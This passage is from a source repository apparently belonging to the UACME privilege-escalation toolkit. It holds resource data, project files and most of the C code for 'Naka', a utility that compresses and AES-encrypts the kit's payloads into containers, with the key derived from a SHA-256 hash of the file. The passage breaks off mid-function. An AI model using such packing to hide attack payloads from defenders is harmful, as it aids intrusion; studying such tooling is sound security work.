AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAGS75P+c2fH/nNnx/5zZ8f+c2fH/nNnx/5zZ8f+c2fH/nNnx/3+81/8A
AAAWAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAJDxGVWS75P9ot9v/aLfb/2i32/9ot9v/aLfb/2m64f9ku+T/JDxGXAAA
AAYAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCTT4AAAAA
AAAAPgAAACgAAACAAAAAIAAAAAEAAQAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAA==
AQAAABQAAAAAAAAABAAAAP////8=
================================================
FILE: Source/Kamikaze/Launcher.html
================================================
================================================
FILE: Source/Naka/Naka.vcxproj
================================================
Debug
Win32
ReleaseInternal
Win32
ReleaseInternal
x64
Release
Win32
Debug
x64
Release
x64
{3BEF8A16-981F-4C65-8AE7-C612B46BE446}
Win32Proj
Naka
10.0
Application
true
v145
Unicode
Application
false
v145
true
Unicode
Application
false
v145
true
Unicode
Application
true
v145
Unicode
false
Application
false
v145
true
Unicode
false
Application
false
v145
true
Unicode
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
SecurityRules.ruleset
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)32
AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
AllRules.ruleset
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
SecurityRules.ruleset
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
$(SolutionDir)
Windows
true
main
Level4
Disabled
_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
$(ProjectDir);$(SolutionDir)
Windows
true
main
Level4
MaxSpeed
true
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
$(SolutionDir)
MultiThreaded
Windows
true
true
false
true
main
Level4
MaxSpeed
true
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
$(SolutionDir)
MultiThreaded
Windows
true
true
false
true
main
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)32.exe
Level4
MaxSpeed
true
true
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
$(ProjectDir);$(SolutionDir)
MultiThreaded
true
Windows
true
true
false
true
main
Level4
MaxSpeed
true
true
NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
CompileAsC
$(ProjectDir);$(SolutionDir)
MultiThreaded
true
Windows
true
true
false
true
main
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\$(ProjectName)64.exe
================================================
FILE: Source/Naka/Naka.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
{13402ae7-3472-4b63-b943-cade7851a002}
Source Files
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
Header Files
minirtl
minirtl
Header Files
================================================
FILE: Source/Naka/Naka.vcxproj.user
================================================
--stable
WindowsLocalDebugger
--stable
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
================================================
FILE: Source/Naka/main.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2025
*
* TITLE: MAIN.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Naka, support payload compressor.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "naka.h"
/*
* CreateSha256HashForBuffer
*
* Purpose:
*
* Return SHA256 hash for buffer.
*
*/
BOOL CreateSha256HashForBuffer(
_In_ PBYTE pbBuffer,
_In_ DWORD cbBuffer,
_Out_ PBYTE *pbHash,
_Out_ PDWORD pcbHash
)
{
BCRYPT_ALG_HANDLE hAlgSha256 = NULL, hHashSha256 = NULL;
BOOL bResult = FALSE;
DWORD cbKeyObject = 0, cbResult = 0;
PBYTE pbKeyObject = NULL;
HANDLE hHeap = GetProcessHeap();
PBYTE _pbHash = NULL;
DWORD _cbHash = 0;
do {
if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
&hAlgSha256,
BCRYPT_SHA256_ALGORITHM,
NULL, 0)))
{
break;
}
//
// CNG object allocation.
//
if (!NT_SUCCESS(BCryptGetProperty(
hAlgSha256,
BCRYPT_OBJECT_LENGTH,
(PUCHAR)&cbKeyObject,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
pbKeyObject = (PBYTE)HeapAlloc(
hHeap,
HEAP_ZERO_MEMORY,
cbKeyObject);
if (pbKeyObject == NULL)
break;
//
// Hash buffer allocation.
//
cbResult = 0;
if (!NT_SUCCESS(BCryptGetProperty(
hAlgSha256,
BCRYPT_HASH_LENGTH,
(PUCHAR)&_cbHash,
sizeof(DWORD),
&cbResult, 0)))
{
break;
}
_pbHash = (PBYTE)HeapAlloc(
hHeap,
HEAP_ZERO_MEMORY,
_cbHash);
if (_pbHash == NULL)
break;
//
// Create hash from buffer.
//
if (!NT_SUCCESS(BCryptCreateHash(
hAlgSha256,
&hHashSha256,
pbKeyObject,
cbKeyObject,
NULL,
0,
0)))
{
break;
}
if (!NT_SUCCESS(BCryptHashData(
hHashSha256,
(PUCHAR)pbBuffer,
(ULONG)cbBuffer,
0)))
{
break;
}
if (!NT_SUCCESS(BCryptFinishHash(
hHashSha256,
_pbHash,
_cbHash,
0)))
{
break;
}
BCryptDestroyHash(hHashSha256);
hHashSha256 = NULL;
BCryptCloseAlgorithmProvider(hAlgSha256, 0);
hAlgSha256 = NULL;
HeapFree(hHeap, 0, pbKeyObject);
pbKeyObject = NULL;
*pbHash = _pbHash;
*pcbHash = _cbHash;
bResult = TRUE;
} while (FALSE);
if (hHashSha256) BCryptDestroyHash(hHashSha256);
if (hAlgSha256) BCryptCloseAlgorithmProvider(hAlgSha256, 0);
if (pbKeyObject) HeapFree(hHeap, 0, pbKeyObject);
if (bResult == FALSE) {
*pbHash = NULL;
*pcbHash = 0;
if (_pbHash) HeapFree(hHeap, 0, _pbHash);
}
return bResult;
}
/*
* GenerateIV
*
* Purpose:
*
* Crypto-random generated initialization vector for AES encryption.
*
*/
BOOL GenerateIV(
_In_ PBYTE pbIV,
_In_ DWORD cbIV
)
{
BOOL bResult = FALSE;
BCRYPT_ALG_HANDLE hAlgRng = NULL;
do {
if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
&hAlgRng,
BCRYPT_RNG_ALGORITHM,
NULL,
0)))
{
break;
}
bResult = (NT_SUCCESS(BCryptGenRandom(
hAlgRng,
pbIV,
cbIV,
0)));
} while (FALSE);
if (hAlgRng)
BCryptCloseAlgorithmProvider(hAlgRng, 0);
return bResult;
}
/*
* DecryptBuffer
*
* Purpose:
*
* Decrypt AES encrypted buffer.
*
*/
BOOL DecryptBuffer(
_In_ PBYTE pbBuffer,
_In_ DWORD cbBuffer,
_In_ PBYTE pbIV,
_In_ PBYTE pbSecret,
_In_ DWORD cbSecret,
_Out_ PBYTE *pbDecryptedBuffer,
_Out_ PDWORD pcbDecryptedBuffer
)
{
BOOL bResult = FALSE;
BCRYPT_ALG_HANDLE hAlgAes = NULL;
BCRYPT_KEY_HANDLE hKey = NULL;
HANDLE heapCNG = NULL;
DWORD cbCipherData, cbKeyObject, cbResult, cbBlockLen;
PBYTE pbKeyObject = NULL, pbCipherData = NULL;
do {
heapCNG = HeapCreate(0, 0, 0);
if (heapCNG == NULL)
break;
if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
&hAlgAes,
BCRYPT_AES_ALGORITHM,
NULL,
0)))
{
break;
}
cbKeyObject = 0;
cbResult = 0;
if (!NT_SUCCESS(BCryptGetProperty(
hAlgAes,
BCRYPT_OBJECT_LENGTH,
(PUCHAR)&cbKeyObject,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
pbKeyObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbKeyObject);
if (pbKeyObject == NULL)
break;
cbBlockLen = 0;
if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
BCRYPT_BLOCK_LENGTH,
(PUCHAR)&cbBlockLen,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
break;
if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
hAlgAes,
&hKey,
pbKeyObject,
cbKeyObject,
pbSecret,
cbSecret,
0)))
{
break;
}
cbCipherData = 0;
if (!NT_SUCCESS(BCryptDecrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
pbIV,
cbBlockLen,
NULL,
0,
&cbCipherData,
BCRYPT_BLOCK_PADDING)))
{
break;
}
pbCipherData = (PBYTE)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
cbCipherData);
if (pbCipherData == NULL) {
break;
}
cbResult = 0;
if (!NT_SUCCESS(BCryptDecrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
pbIV,
cbBlockLen,
pbCipherData,
cbCipherData,
&cbResult,
BCRYPT_BLOCK_PADDING)))
{
break;
}
BCryptDestroyKey(hKey);
hKey = NULL;
*pbDecryptedBuffer = pbCipherData;
*pcbDecryptedBuffer = cbCipherData;
bResult = TRUE;
} while (FALSE);
if (hKey != NULL)
BCryptDestroyKey(hKey);
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);
if (heapCNG) HeapDestroy(heapCNG);
if (bResult == FALSE) {
if (pbCipherData) {
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, pbCipherData);
}
*pbDecryptedBuffer = NULL;
*pcbDecryptedBuffer = 0;
}
return bResult;
}
/*
* EncryptBuffer
*
* Purpose:
*
* Encrypt given buffer with AES-CBC.
*
*/
BOOL EncryptBuffer(
_In_ PBYTE pbBuffer,
_In_ DWORD cbBuffer,
_Inout_ PBYTE pbIV,
_In_ PBYTE pbSecret,
_In_ DWORD cbSecret,
_Out_ PBYTE *pbEncryptedBuffer,
_Out_ PDWORD pcbEncryptedBuffer
)
{
BOOL bResult = FALSE;
BCRYPT_ALG_HANDLE hAlgAes = NULL;
BCRYPT_KEY_HANDLE hKey = NULL;
HANDLE heapCNG = NULL;
DWORD cbCipherData, cbObject, cbResult, cbBlockLen;
PBYTE pbObject, pbCipherData = NULL, _pbIV;
do {
heapCNG = HeapCreate(0, 0, 0);
if (heapCNG == NULL)
break;
if (!NT_SUCCESS(BCryptOpenAlgorithmProvider(
&hAlgAes,
BCRYPT_AES_ALGORITHM,
NULL,
0)))
{
break;
}
cbObject = 0;
cbResult = 0;
if (!NT_SUCCESS(BCryptGetProperty(
hAlgAes,
BCRYPT_OBJECT_LENGTH,
(PUCHAR)&cbObject,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
pbObject = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbObject);
if (pbObject == NULL)
break;
cbBlockLen = 0;
if (!NT_SUCCESS(BCryptGetProperty(hAlgAes,
BCRYPT_BLOCK_LENGTH,
(PUCHAR)&cbBlockLen,
sizeof(DWORD),
&cbResult,
0)))
{
break;
}
if (cbBlockLen > DCU_IV_MAX_BLOCK_LENGTH)
break;
if (!GenerateIV(pbIV, cbBlockLen))
break;
_pbIV = (PBYTE)HeapAlloc(heapCNG, HEAP_ZERO_MEMORY, cbBlockLen);
if (_pbIV == NULL)
break;
RtlCopyMemory(_pbIV, pbIV, cbBlockLen);
if (!NT_SUCCESS(BCryptSetProperty( //-V542
hAlgAes,
BCRYPT_CHAINING_MODE,
(PUCHAR)BCRYPT_CHAIN_MODE_CBC,
sizeof(BCRYPT_CHAIN_MODE_CBC),
0)))
{
break;
}
if (!NT_SUCCESS(BCryptGenerateSymmetricKey(
hAlgAes,
&hKey,
pbObject,
cbObject,
pbSecret,
cbSecret,
0)))
{
break;
}
cbCipherData = 0;
if (!NT_SUCCESS(BCryptEncrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
_pbIV,
cbBlockLen,
NULL,
0,
&cbCipherData,
BCRYPT_BLOCK_PADDING)))
{
break;
}
pbCipherData = (PBYTE)HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
cbCipherData);
if (pbCipherData == NULL) {
break;
}
cbResult = 0;
if (!NT_SUCCESS(BCryptEncrypt(
hKey,
pbBuffer,
cbBuffer,
NULL,
_pbIV,
cbBlockLen,
pbCipherData,
cbCipherData,
&cbResult,
BCRYPT_BLOCK_PADDING)))
{
break;
}
BCryptDestroyKey(hKey);
hKey = NULL;
*pbEncryptedBuffer = pbCipherData;
*pcbEncryptedBuffer = cbCipherData;
bResult = TRUE;
} while (FALSE);
if (hKey != NULL)
BCryptDestroyKey(hKey);
if (hAlgAes != NULL)
BCryptCloseAlgorithmProvider(hAlgAes, 0);
if (heapCNG) {
HeapDestroy(heapCNG);
}
if (bResult == FALSE) {
if (pbCipherData) HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, pbCipherData);
*pbEncryptedBuffer = NULL;
*pcbEncryptedBuffer = 0;
}
return bResult;
}
/*
* supWriteBufferToFile
*
* Purpose:
*
* Create new file and write buffer to it.
*
*/
BOOL supWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ PVOID Buffer,
_In_ DWORD BufferSize
)
{
HANDLE hFile;
DWORD bytesIO;
if (Buffer == NULL || BufferSize == 0)
return FALSE;
hFile = CreateFileW(lpFileName,
GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
return FALSE;
}
WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
CloseHandle(hFile);
return (bytesIO == BufferSize);
}
/*
* supReadBufferFromFile
*
* Purpose:
*
* Open existing file and read from it to buffer.
*
*/
PVOID supReadBufferFromFile(
_In_ LPWSTR lpFileName,
_Out_ PLARGE_INTEGER FileSize
)
{
BOOL bSuccess = FALSE;
DWORD r;
PVOID FileData = NULL;
HANDLE hFile = INVALID_HANDLE_VALUE;
LARGE_INTEGER fileSize;
do {
hFile = CreateFile(
lpFileName,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
0,
NULL);
if (hFile != INVALID_HANDLE_VALUE) {
fileSize.QuadPart = 0;
if (!GetFileSizeEx(hFile, &fileSize))
break;
if (fileSize.QuadPart == 0)
break;
FileData = HeapAlloc(
GetProcessHeap(),
HEAP_ZERO_MEMORY,
(SIZE_T)fileSize.LowPart);
if (FileData == NULL)
break;
if (!ReadFile(
hFile,
FileData,
fileSize.LowPart,
(LPDWORD)&r, NULL))
{
HeapFree(GetProcessHeap(), 0, FileData);
FileData = NULL;
break;
}
if (FileSize)
*FileSize = fileSize;
bSuccess = TRUE;
}
} while (FALSE);
if (!bSuccess) {
if (FileSize) {
fileSize.QuadPart = 0;
*FileSize = fileSize;
}
}
if (hFile != INVALID_HANDLE_VALUE)
CloseHandle(hFile);
return FileData;
}
/*
* IsValidContainerHeader
*
* Purpose:
*
* Basic santity checks over container header.
*
*/
BOOL IsValidContainerHeader(
_In_ PDCU_HEADER UnitHeader,
_In_ DWORD FileSize
)
{
DWORD HeaderCrc;
__try {
if ((UnitHeader->Magic != UACME_CONTAINER_PACKED_DATA) && //Naka
(UnitHeader->Magic != UACME_CONTAINER_PACKED_UNIT) && //Naka
(UnitHeader->Magic != UACME_CONTAINER_PACKED_CODE) && //Kuma
(UnitHeader->Magic != UACME_CONTAINER_PACKED_KEYS)) //Kuma
{
return FALSE;
}
//
// Note that IV has different meaning in Kuma containers.
//
HeaderCrc = UnitHeader->HeaderCrc;
UnitHeader->HeaderCrc = 0;
if (RtlComputeCrc32(0, UnitHeader, sizeof(DCU_HEADER)) != HeaderCrc)
return FALSE;
if ((UnitHeader->cbData == 0) ||
(UnitHeader->cbDeltaSize == 0))
return FALSE;
if (UnitHeader->cbData > FileSize)
return FALSE;
if (UnitHeader->cbDeltaSize > FileSize)
return FALSE;
if (UnitHeader->cbDeltaSize > UnitHeader->cbData)
return FALSE;
}
__except (EXCEPTION_EXECUTE_HANDLER) {
return FALSE;
}
return TRUE;
}
/*
* DecompressContainerUnit
*
* Purpose:
*
* Decompress given container file.
*
*/
void DecompressContainerUnit(
_In_ LPWSTR lpInputFile,
_In_ LPWSTR lpKeyFile
)
{
PUCHAR FileData = NULL;
LPWSTR NewName = NULL;
SIZE_T sz = 0;
LARGE_INTEGER FileSize, KeyFileSize;
PDCU_HEADER UnitHeader;
PBYTE pbDecryptedBuffer = NULL;
DWORD cbDecryptedBuffer = 0;
DELTA_INPUT diDelta, diSource;
DELTA_OUTPUT doOutput;
HANDLE hHeap = GetProcessHeap();
PBYTE pbKeyBlob = NULL;
PBYTE DataPtr;
do {
sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);
NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);
if (NewName == NULL)
break;
FileSize.QuadPart = 0;
FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);
if ((FileData == NULL) || (FileSize.QuadPart == 0))
break;
KeyFileSize.QuadPart = 0;
pbKeyBlob = (PBYTE)supReadBufferFromFile(lpKeyFile, &KeyFileSize);
if ((pbKeyBlob == NULL) || (KeyFileSize.QuadPart == 0))
break;
UnitHeader = (PDCU_HEADER)FileData;
if (!IsValidContainerHeader(UnitHeader, FileSize.LowPart))
break;
DataPtr = (PBYTE)UnitHeader + sizeof(DCU_HEADER);
if (!DecryptBuffer(
(PBYTE)DataPtr,
UnitHeader->cbData,
UnitHeader->bIV,
(PBYTE)pbKeyBlob,
KeyFileSize.LowPart,
&pbDecryptedBuffer,
&cbDecryptedBuffer))
{
break;
}
if (cbDecryptedBuffer > FileSize.LowPart)
break;
RtlSecureZeroMemory(&diSource, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&diDelta, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&doOutput, sizeof(DELTA_OUTPUT));
diDelta.Editable = FALSE;
diDelta.lpcStart = pbDecryptedBuffer;
diDelta.uSize = UnitHeader->cbDeltaSize;
if (ApplyDeltaB(DELTA_FILE_TYPE_RAW, diSource, diDelta, &doOutput)) {
if (_filename_noext(NewName, lpInputFile)) {
_strcat(NewName, TEXT(".out"));
supWriteBufferToFile(NewName, doOutput.lpStart, (DWORD)doOutput.uSize);
}
DeltaFree(doOutput.lpStart);
}
} while (FALSE);
if (pbDecryptedBuffer != NULL)
HeapFree(hHeap, 0, pbDecryptedBuffer);
if (NewName != NULL)
HeapFree(hHeap, 0, NewName);
if (FileData != NULL)
HeapFree(hHeap, 0, FileData);
if (pbKeyBlob != NULL)
HeapFree(hHeap, 0, pbKeyBlob);
}
/*
* CreateContainerPackedUnit
*
* Purpose:
*
* Create container with compressed file inside.
*
*/
void CreateContainerPackedUnit(
_In_ LPWSTR lpInputFile
)
{
PUCHAR FileData = NULL;
HANDLE hHeap = GetProcessHeap();
LPWSTR NewName = NULL;
SIZE_T sz = 0;
LARGE_INTEGER FileSize;
DELTA_INPUT d_in, d_target, s_op, t_op, g_op;
DELTA_OUTPUT d_out;
PBYTE pbHash = NULL, pbEncryptedBuffer = NULL;
DWORD cbHash = 0, cbEncryptedBuffer = 0;
PDCU_HEADER UnitHeader;
PIMAGE_NT_HEADERS NtHeaders;
PIMAGE_FILE_HEADER fheader;
PVOID hashSource;
DWORD hashSize, Magic;
PBYTE DataPtr;
#ifdef _DEBUG
LPWSTR KeyName = NULL;
#endif
BYTE bIV[DCU_IV_MAX_BLOCK_LENGTH];
do {
RtlSecureZeroMemory(&d_out, sizeof(DELTA_OUTPUT));
sz = (1 + _strlen(lpInputFile)) * sizeof(WCHAR);
NewName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);
if (NewName == NULL)
break;
#ifdef _DEBUG
KeyName = (LPWSTR)HeapAlloc(hHeap, HEAP_ZERO_MEMORY, sz);
if (KeyName == NULL)
break;
#endif
FileSize.QuadPart = 0;
FileData = (PUCHAR)supReadBufferFromFile(lpInputFile, &FileSize);
if ((FileData == NULL) || (FileSize.QuadPart == 0))
break;
NtHeaders = RtlImageNtHeader(FileData);
if (NtHeaders == NULL) {
//
// Not an image file, use whole file SHA256 hash as key.
//
hashSource = FileData;
hashSize = FileSize.LowPart;
Magic = UACME_CONTAINER_PACKED_DATA;
}
else {
//
// Image file, create SHA256 hash from IMAGE_FILE_HEADER.
//
fheader = &NtHeaders->FileHeader;
hashSource = fheader;
hashSize = sizeof(IMAGE_FILE_HEADER);
Magic = UACME_CONTAINER_PACKED_UNIT;
}
if (!CreateSha256HashForBuffer((PBYTE)hashSource, hashSize, &pbHash, &cbHash))
break;
if (cbHash > 32)
break;
if (_filename_noext(NewName, lpInputFile)) {
_strcat(NewName, TEXT(".key"));
supWriteBufferToFile(NewName, pbHash, (DWORD)cbHash);
}
//
// Pack file to buffer.
//
RtlSecureZeroMemory(&d_in, sizeof(DELTA_INPUT));
d_target.lpcStart = FileData;
d_target.uSize = FileSize.LowPart;
d_target.Editable = FALSE;
RtlSecureZeroMemory(&s_op, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&t_op, sizeof(DELTA_INPUT));
RtlSecureZeroMemory(&g_op, sizeof(DELTA_INPUT));
if (!CreateDeltaB(DELTA_FILE_TYPE_RAW,
DELTA_FLAG_NONE,
DELTA_FLAG_NONE,
d_in,
d_target,
s_op,
t_op,
g_op,
NULL,
0,
&d_out))
{
break;
}
//
// Encrypt buffer with AES-CBC using SHA256 hash as key.
//
RtlSecureZeroMemory(&bIV, sizeof(bIV));
if (!EncryptBuffer(
(PBYTE)d_out.lpStart,
(DWORD)d_out.uSize,
(PBYTE)&bIV,
pbHash,
cbHash,
&pbEncryptedBuffer,
&cbEncryptedBuffer))
{
break;
}
DeltaFree(d_out.lpStart);
d_out.lpStart = NULL;
//
// Build final package and save it to disk.
//
sz = sizeof(DCU_HEADER) + cbEncryptedBuffer;
UnitHeader = (PDCU_HEADER)HeapAlloc(
hHeap,
HEAP_ZERO_MEMORY,
sz);
if (UnitHeader) {
UnitHeader->Magic = Magic;
UnitHeader->cbData = cbEncryptedBuffer;
